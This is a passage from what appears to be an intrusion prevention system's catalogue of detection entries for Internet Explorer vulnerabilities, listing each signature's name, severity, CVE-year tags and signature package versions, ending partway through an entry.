File-Text_Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass

About this situation: Traffic that might be an attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-03, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer 11 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-02, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-04, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Selection.empty-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Internet-Explorer-Selection.empty-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-10, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Colon-System-Compromise

About this situation: Detects calls of showHelp() with double colons and a directory-traversal attempt
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-07, CVE2003, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1793-5242
Vulnerability: HTTP-Ie-Showhelp-Double-Colon-System-Compromise
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Slash-System-Compromise

About this situation: Detects calls of showHelp() with double backslashes
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2004, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Ie-Showhelp-Double-Slash-System-Compromise
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Speech API detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2007-06, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-12, CVE2009, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1734-5242
Vulnerability: Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-08, CVE2008, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-08, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1733-5242
Vulnerability: Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Title-Element-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Title-Element-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-toJSON-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2019, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-toJSON-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this situation: An attempt to exploit a cross site scripting vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-585-5211
Vulnerability: Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-05, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-05, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-07, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-07, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-07, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-07, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2530
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2531
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-682-5211
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption-2

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

About this situation: An attempt to exploit a security bypass vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Url-Validation

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-02, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1294-5242
Vulnerability: Microsoft-Internet-Explorer-Url-Validation
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation

About this situation: Malicious usage of COM objects that are not implemented as ActiveX controls detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-06, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-0806

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-03, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-802-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2012-04, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-05, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-582-5211
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776-2

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-05, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-05, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-04, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0990
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-04, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-04, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0995
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-07, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VBScript-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Vulnerability: Microsoft-Internet-Explorer-VBScript-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VML-Buffer-Overrun

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows XP, Windows 2003, Windows XP 64-bit, Windows 2000 SP4, Windows 2003 64-bit, x86, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2007-01, CVE2007, Windows XP not specific, Windows 2003 not specific, Windows XP 64-bit not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-VML-Buffer-Overrun
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
